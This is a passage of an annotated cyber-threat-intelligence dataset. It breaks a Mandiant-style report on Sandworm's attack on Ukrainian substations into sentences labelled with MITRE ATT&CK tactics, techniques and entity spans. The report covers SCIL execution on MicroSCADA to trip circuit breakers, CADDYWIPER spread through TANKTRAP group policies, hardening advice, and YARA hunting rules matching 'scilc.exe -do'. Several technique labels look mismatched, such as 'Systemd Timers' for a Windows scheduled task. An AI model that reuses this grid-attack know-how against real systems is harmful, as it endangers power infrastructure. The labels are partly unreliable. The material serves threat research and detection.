"allowed default access ", "start": 72, "end": 95, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s63-944966", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "The impacted MicroSCADA system was running an EOL software version that allowed default access to the SCIL-API.", "sentence_text": "The “-do” flag specifies a SCIL program file to execute (Figure 8).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "used SCIL command flag to execute a program file", "entities": [ { "text": "“-do” flag ", "start": 4, "end": 15, "label": "MalwareTool" }, { "text": "SCIL program file ", "start": 27, "end": 45, "label": "MalwareTool" }, { "text": "execute ", "start": 48, "end": 56, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s64-e99885", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "The “-do” flag specifies a SCIL program file to execute (Figure 8).", "sentence_text": "Lastly, the command supplies a file named “s1.txt” in the \"pack\\scil\\\" folder of the attacker's ISO.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "provided a SCIL command file via the ISO", "entities": [ { "text": "attacker", "start": 85, "end": 93, "label": "ThreatActor" }, { "text": "command", "start": 12, "end": 19, "label": "MalwareTool" }, { "text": "file named “s1.txt”", "start": 31, "end": 50, "label": "MalwareTool" }, { "text": "\"pack\\scil\\\" folder of the attacker's ISO", "start": 58, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "the command supplies a file named “s1.txt”", "start": 8, "end": 50, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s65-64f691", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "Lastly, the command supplies a file named “s1.txt” in the \"pack\\scil\\\" folder of the attacker's ISO.", "sentence_text": "We assess \"pack\\scil\\s1.txt\" is likely a file containing SCIL commands the attackers executed in MicroSCADA.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "executed SCIL commands from a text file on the MICROSCADA system", "entities": [ { "text": "attackers", "start": 75, "end": 84, "label": "ThreatActor" }, { "text": "commands ", "start": 62, "end": 71, "label": "MalwareTool" }, { "text": "pack\\scil\\s1.txt", "start": 11, "end": 27, "label": "MalwareTool" }, { "text": "MicroSCADA", "start": 97, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "attackers executed in MicroSCADA", "start": 75, "end": 107, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s66-754886", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "We assess \"pack\\scil\\s1.txt\" is likely a file containing SCIL commands the attackers executed in MicroSCADA.", "sentence_text": "This file was unrecoverable at the time of analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s67-d39983", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "This file was unrecoverable at the time of analysis.", "sentence_text": "According to Hitachi Energy’s documentation , SCIL is a high level programming language designed for MicroSCADA control systems and can operate the system and its features (Figure 9).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s68-a9e76b", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "According to Hitachi Energy’s documentation , SCIL is a high level programming language designed for MicroSCADA control systems and can operate the system and its features (Figure 9).", "sentence_text": "While we were unable to identify the SCIL commands executed, we believe they were probably commands to open circuit breakers in the victim’s substation environments.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "executed SCIL commands to open substation circuit breakers", "entities": [ { "text": "SCIL commands ", "start": 37, "end": 51, "label": "MalwareTool" }, { "text": "victim’s substation environments", "start": 132, "end": 164, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-83_mitre_report-p1-s69-4f6263", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "While we were unable to identify the SCIL commands executed, we believe they were probably commands to open circuit breakers in the victim’s substation environments.", "sentence_text": "The SCIL commands would have caused the MicroSCADA server to relay the commands to the substation RTUs via either the IEC-60870-5-104 protocol for TCP/IP connections or the IEC-60870-5-101 protocol for serial connections.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" }, { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "used SCIL commands to send control instructions to substation devices", "entities": [ { "text": "SCIL commands ", "start": 4, "end": 18, "label": "MalwareTool" }, { "text": "MicroSCADA server ", "start": 40, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "substation RTUs ", "start": 87, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "caused the MicroSCADA server to relay the commands to the substation RTUs", "start": 29, "end": 102, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s70-026904", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "The SCIL commands would have caused the MicroSCADA server to relay the commands to the substation RTUs via either the IEC-60870-5-104 protocol for TCP/IP connections or the IEC-60870-5-101 protocol for serial connections.", "sentence_text": "Sandworm Deployed New CADDYWIPER Variant to Further Disrupt the Victim’s IT Environment", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485.001", "name": "Lifecycle-Triggered Deletion" } ], "procedure": "deployed a new CADDYWIPER variant to disrupt IT systems", "entities": [ { "text": "Sandworm", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "New CADDYWIPER Variant ", "start": 18, "end": 41, "label": "MalwareTool" }, { "text": "Victim’s IT Environment", "start": 64, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "Deployed New CADDYWIPER Varian", "start": 9, "end": 39, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s71-130a5b", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "Sandworm Deployed New CADDYWIPER Variant to Further Disrupt the Victim’s IT Environment", "sentence_text": "Two days following the OT activity, Sandworm deployed a new variant of CADDYWIPER throughout the IT environment.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485.001", "name": "Lifecycle-Triggered Deletion" } ], "procedure": "deployed a new CADDYWIPER variant across the IT environment", "entities": [ { "text": "Sandworm", "start": 36, "end": 44, "label": "ThreatActor" }, { "text": "new variant of CADDYWIPER", "start": 56, "end": 81, "label": "MalwareTool" }, { "text": "IT environment", "start": 97, "end": 111, "label": "Infrastructure_Indicator" }, { "text": " deployed a new variant of CADDYWIPER", "start": 44, "end": 81, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s72-a79bd4", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "Two days following the OT activity, Sandworm deployed a new variant of CADDYWIPER throughout the IT environment.", "sentence_text": "We have observed CADDYWIPER deployed across several verticals in Ukraine, including the government and financial sectors, throughout Russia’s invasion of Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485.001", "name": "Lifecycle-Triggered Deletion" } ], "procedure": "CADDYWIPER was deployed across multiple sectors in Ukraine", "entities": [ { "text": "Russia", "start": 133, "end": 139, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 17, "end": 27, "label": "MalwareTool" }, { "text": "government and financial sectors", "start": 88, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "several verticals in Ukraine,", "start": 44, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "CADDYWIPER deployed across several verticals in Ukraine", "start": 17, "end": 72, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s73-dcfb2f", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "We have observed CADDYWIPER deployed across several verticals in Ukraine, including the government and financial sectors, throughout Russia’s invasion of Ukraine.", "sentence_text": "CADDYWIPER is a disruptive wiper written in C that is focused on making data irrecoverable and causing maximum damage within an environment.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485.001", "name": "Lifecycle-Triggered Deletion" } ], "procedure": "used CADDYWIPER to irrecoverably destroy data and cause damage", "entities": [ { "text": "CADDYWIPER", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "making data irrecoverable", "start": 65, "end": 90, "label": "Action" }, { "text": "causing maximum damage", "start": 95, "end": 117, "label": "Action" }, { "text": "disruptive wiper written in C ", "start": 16, "end": 46, "label": "MalwareTool" } ] }, { "uid": "mitre-83_mitre_report-p1-s74-9c9151", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "CADDYWIPER is a disruptive wiper written in C that is focused on making data irrecoverable and causing maximum damage within an environment.", "sentence_text": "CADDYWIPER will attempt to wipe all files before proceeding to wipe any mapped drives.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485.001", "name": "Lifecycle-Triggered Deletion" } ], "procedure": "wipe all files, wipe any mapped drives", "entities": [ { "text": "CADDYWIPER ", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "wipe any mapped drives", "start": 63, "end": 85, "label": "Action" }, { "text": "wipe all files", "start": 27, "end": 41, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s75-69687c", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "CADDYWIPER will attempt to wipe all files before proceeding to wipe any mapped drives.", "sentence_text": "It will then attempt to wipe the physical drive partition itself.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485.001", "name": "Lifecycle-Triggered Deletion" } ], "procedure": "wiped physical drive partitions", "entities": [ { "text": "It ", "start": 0, "end": 3, "label": "MalwareTool" }, { "text": " physical drive partition", "start": 32, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "wipe the physical drive partition itself.", "start": 24, "end": 65, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s76-5e39b7", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "It will then attempt to wipe the physical drive partition itself.", "sentence_text": "We have observed Sandworm utilize CADDYWIPER in disruptive operations across multiple intrusions.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485.001", "name": "Lifecycle-Triggered Deletion" } ], "procedure": "used CADDYWIPER in disruptive operations across multiple instructions", "entities": [ { "text": "Sandworm", "start": 17, "end": 25, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 34, "end": 44, "label": "MalwareTool" }, { "text": "utilize CADDYWIPER ", "start": 26, "end": 45, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s77-a7a6b8", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "We have observed Sandworm utilize CADDYWIPER in disruptive operations across multiple intrusions.", "sentence_text": "Sandworm deployed CADDYWIPER in this operation via two Group Policy Objects (GPO) from a Domain Controller using TANKTRAP.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1484.001", "name": "Group Policy Modification" } ], "procedure": "deployed CADDYWIER through two GPOs on a domian controller using TANKTRAP", "entities": [ { "text": "Sandworm", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 18, "end": 28, "label": "MalwareTool" }, { "text": "TANKTRAP", "start": 113, "end": 121, "label": "MalwareTool" }, { "text": "Group Policy Objects (GPO) ", "start": 55, "end": 82, "label": "MalwareTool" }, { "text": "Domain Controller ", "start": 89, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "deployed CADDYWIPER ", "start": 9, "end": 29, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s78-7f4719", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "Sandworm deployed CADDYWIPER in this operation via two Group Policy Objects (GPO) from a Domain Controller using TANKTRAP.", "sentence_text": "TANKTRAP is a utility written in PowerShell that utilizes Windows group policy to spread and launch a wiper.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" }, { "id": "T1485.001", "name": "Lifecycle-Triggered Deletion" } ], "procedure": "used TANKTRAP powershell utility to spread a wiper via group policy", "entities": [ { "text": "TANKTRAP", "start": 0, "end": 8, "label": "MalwareTool" }, { "text": "utility written in PowerShell", "start": 14, "end": 43, "label": "MalwareTool" }, { "text": "wiper.", "start": 102, "end": 108, "label": "MalwareTool" }, { "text": " utilizes Windows group policy ", "start": 48, "end": 79, "label": "Action" }, { "text": "spread and launch a wiper.", "start": 82, "end": 108, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s79-8a216d", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "TANKTRAP is a utility written in PowerShell that utilizes Windows group policy to spread and launch a wiper.", "sentence_text": "These group policies contained instructions to copy a file from a server to the local hard drive and to schedule a task to run the copied file at a particular time.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "copied a file from aserver to the locala host and scheduled it to run via a task", "entities": [ { "text": "group policies ", "start": 6, "end": 21, "label": "Infrastructure_Indicator" }, { "text": "server ", "start": 66, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "local hard drive ", "start": 80, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "copy a file ", "start": 47, "end": 59, "label": "Action" }, { "text": "schedule a task", "start": 104, "end": 119, "label": "Action" }, { "text": "run the copied file at a particular time.", "start": 123, "end": 164, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s80-1ca19f", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "These group policies contained instructions to copy a file from a server to the local hard drive and to schedule a task to run the copied file at a particular time.", "sentence_text": "Both TANKTRAP GPOs deployed CADDYWIPER from a staged directory to systems as msserver.exe.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1036", "name": "Masquerading" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "TANKTRAP GPOs deployed CADDYWIPER from a staged directory to target systems and executed it as msserver.exe.", "entities": [ { "text": "TANKTRAP GPOs", "start": 5, "end": 18, "label": "ThreatActor" }, { "text": "deployed CADDYWIPER", "start": 19, "end": 38, "label": "Action" }, { "text": "CADDYWIPER", "start": 28, "end": 38, "label": "MalwareTool" }, { "text": "staged directory", "start": 46, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "msserver.exe", "start": 77, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-83_mitre_report-p1-s81-d8bce8", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "Both TANKTRAP GPOs deployed CADDYWIPER from a staged directory to systems as msserver.exe.", "sentence_text": "CADDYWIPER was then executed as a scheduled task at a predetermined time.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053.006", "name": "Systemd Timers" } ], "procedure": "CADDYWIPER was executed as a scheduled task at a predetermined time", "entities": [ { "text": "CADDYWIPER", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "executed as a scheduled task ", "start": 20, "end": 49, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s82-f2c164", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "CADDYWIPER was then executed as a scheduled task at a predetermined time.", "sentence_text": "Appendix A: Discovery and Hardening Guidance", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s83-dd5a84", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "Appendix A: Discovery and Hardening Guidance", "sentence_text": "In this incident, the attacker leveraged an EOL version of the MicroSCADA supervisory control system.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "leveraged an end-of-life MicroSCADA control system", "entities": [ { "text": "attacker ", "start": 22, "end": 31, "label": "ThreatActor" }, { "text": " EOL version of the MicroSCADA supervisory control system", "start": 43, "end": 100, "label": "Infrastructure_Indicator" }, { "text": "leveraged an EOL version of the MicroSCADA supervisory control system.", "start": 31, "end": 101, "label": "Action" } ] }, { "uid": "mitre-83_mitre_report-p1-s84-715d74", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "In this incident, the attacker leveraged an EOL version of the MicroSCADA supervisory control system.", "sentence_text": "If required to continue using the interface, asset owners can refer to MRK511518 MicroSCADA X Cyber Security Deployment Guideline on how to harden the MicroSCADA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s85-f278bf", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "If required to continue using the interface, asset owners can refer to MRK511518 MicroSCADA X Cyber Security Deployment Guideline on how to harden the MicroSCADA.", "sentence_text": "Please contact the Hitachi Energy MicroSCADA support team to obtain the documentation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s86-ab9a27", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "Please contact the Hitachi Energy MicroSCADA support team to obtain the documentation.", "sentence_text": "We note that the MicroSCADA control system became a Hitachi Energy product in 2022 after a divestiture from ABB.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s87-139ebd", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 87, "context_before": "We note that the MicroSCADA control system became a Hitachi Energy product in 2022 after a divestiture from ABB.", "sentence_text": "Asset owners should reference both vendors in asset inventories and manual asset inspections to determine if the product is present in any OT environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s88-7cb3e7", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "Asset owners should reference both vendors in asset inventories and manual asset inspections to determine if the product is present in any OT environments.", "sentence_text": "Harden MicroSCADA and other SCADA management hosts:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s89-8a0c91", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "Harden MicroSCADA and other SCADA management hosts:", "sentence_text": "Update MicroSCADA to supported versions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s90-f0638c", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "Update MicroSCADA to supported versions.", "sentence_text": "Configure MicroSCADA to require authentication and establish a least privilege design for user permissions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s91-cfcb73", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "Configure MicroSCADA to require authentication and establish a least privilege design for user permissions.", "sentence_text": "Establish robust network segmentation between MicroSCADA hosts and IT networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s92-bd3df5", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "Establish robust network segmentation between MicroSCADA hosts and IT networks.", "sentence_text": "Enable robust application logging for MicroSCADA and aggregate logs to a central location.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s93-6df44c", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "Enable robust application logging for MicroSCADA and aggregate logs to a central location.", "sentence_text": "If/where feasible, configure the base system in “read-only” mode and ensure no external SCIL-API programs (such as scilc.exe) are allowed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s94-a6eae5", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "If/where feasible, configure the base system in “read-only” mode and ensure no external SCIL-API programs (such as scilc.exe) are allowed.", "sentence_text": "Consult with OEMs for installed SCADA software to identify similar methods of code execution within their software and to obtain guidance on mitigations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s95-34f3fe", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "Consult with OEMs for installed SCADA software to identify similar methods of code execution within their software and to obtain guidance on mitigations.", "sentence_text": "Monitor MicroSCADA systems and other SCADA management systems for:\nCommand-line execution of MicroSCADA “Scilc.exe” binary and other native MicroSCADA binaries that may be leveraged to execute unauthorized SCIL program/commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s96-129b0e", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "Monitor MicroSCADA systems and other SCADA management systems for:\nCommand-line execution of MicroSCADA “Scilc.exe” binary and other native MicroSCADA binaries that may be leveraged to execute unauthorized SCIL program/commands.", "sentence_text": "Network traffic and process related telemetry to/from host(s) operating the MicroSCADA software.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s97-4f475e", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "Network traffic and process related telemetry to/from host(s) operating the MicroSCADA software.", "sentence_text": "Investigate anomalous activity and correlate findings with process telemetry.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s98-4711c5", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "Investigate anomalous activity and correlate findings with process telemetry.", "sentence_text": "Files transferred or moved onto MicroSCADA hosts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s99-c8d69d", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "Files transferred or moved onto MicroSCADA hosts.", "sentence_text": "Newly created files with MicroSCADA or SCIL programming language references.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s100-5a97c5", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "Newly created files with MicroSCADA or SCIL programming language references.", "sentence_text": "Unauthorized changes in MicroSCADA system configuration and data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s101-f9759c", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 101, "context_before": "Unauthorized changes in MicroSCADA system configuration and data.", "sentence_text": "Appendix B: Indicators of Compromise (IOCs)\nAppendix C: YARA Rules rule M_Methodology_MicroSCADA_SCILC_Strings { meta:\nauthor = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for files containing strings associated with the MicroSCADA Supervisory Control Implementation Language (SCIL) scilc.exe binary.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s102-32ec94", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 102, "context_before": "Appendix B: Indicators of Compromise (IOCs)\nAppendix C: YARA Rules rule M_Methodology_MicroSCADA_SCILC_Strings { meta:\nauthor = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for files containing strings associated with the MicroSCADA Supervisory Control Implementation Language (SCIL) scilc.exe binary.\"", "sentence_text": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s103-603037", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 103, "context_before": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "strings:\n$s1 = \"scilc.exe\" ascii wide $s2 = \"Scilc.exe\" ascii wide $s3 = \"SCILC.exe\" ascii wide $s4 = \"SCILC.EXE\" ascii wide condition:\nfilesize < 1MB and any of them } rule M_Hunting_MicroSCADA_SCILC_Program_Execution_Strings { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s104-31581d", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 104, "context_before": "strings:\n$s1 = \"scilc.exe\" ascii wide $s2 = \"Scilc.exe\" ascii wide $s3 = \"SCILC.exe\" ascii wide $s4 = \"SCILC.EXE\" ascii wide condition:\nfilesize < 1MB and any of them } rule M_Hunting_MicroSCADA_SCILC_Program_Execution_Strings { meta:", "sentence_text": "author = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for files containing strings associated with execution of the MicroSCADA Supervisory Control Implementation Language (SCIL) scilc.exe binary.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s105-038f45", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 105, "context_before": "author = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for files containing strings associated with execution of the MicroSCADA Supervisory Control Implementation Language (SCIL) scilc.exe binary.\"", "sentence_text": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s106-9fbf90", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 106, "context_before": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "strings:\n$s = \"scilc.exe -do\" nocase ascii wide condition:\nfilesize < 1MB and all of them } rule M_Methodology_MicroSCADA_Path_Strings { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s107-b96adc", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 107, "context_before": "strings:\n$s = \"scilc.exe -do\" nocase ascii wide condition:\nfilesize < 1MB and all of them } rule M_Methodology_MicroSCADA_Path_Strings { meta:", "sentence_text": "author = \"Mandiant\" date = \"2023-02-27\" description = \"Searching for files containing references to MicroSCADA filesystem path containing native MicroSCADA binaries and resources.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s108-ec8d12", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 108, "context_before": "author = \"Mandiant\" date = \"2023-02-27\" description = \"Searching for files containing references to MicroSCADA filesystem path containing native MicroSCADA binaries and resources.\"", "sentence_text": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s109-d78eb2", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 109, "context_before": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "strings:\n$s1 = \"sc\\\\prog\\\\exec\" nocase ascii wide condition:\nfilesize < 1MB and $s1 } rule M_Hunting_VBS_Batch_Launcher_Strings { meta:\nauthor = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for VBS files used to launch a batch script.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s110-e51165", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 110, "context_before": "strings:\n$s1 = \"sc\\\\prog\\\\exec\" nocase ascii wide condition:\nfilesize < 1MB and $s1 } rule M_Hunting_VBS_Batch_Launcher_Strings { meta:\nauthor = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for VBS files used to launch a batch script.\"", "sentence_text": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s111-3837b0", "source": "mitre", "doc_id": "83_mitre_report", "page_number": 1, "sentence_id": 111, "context_before": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "strings:\n$s1 = \"CreateObject(\\\"WScript.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-83_mitre_report-p1-s112-4a539b", "source": "mitre", "doc_id": "83_mitre_report", 